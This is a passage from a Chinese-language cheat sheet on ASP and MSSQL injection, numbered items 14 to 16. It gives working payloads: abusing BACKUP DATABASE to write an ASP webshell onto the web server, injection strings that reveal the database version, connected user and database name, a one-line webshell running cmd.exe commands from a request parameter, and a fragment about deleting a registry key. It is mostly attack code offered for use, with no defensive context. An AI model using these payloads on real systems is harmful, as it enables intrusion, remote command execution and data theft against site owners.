全面认识ASP注入技巧

'',''SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'' 删除键,包括该键下所有值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values (''<% Dim oScript %>'');
backup database model to disk=''c:\l.asp'';

15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()=''dbo'' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库



16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values (''<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>'');
backup database model to disk=''g:\wwwtest\l.asp''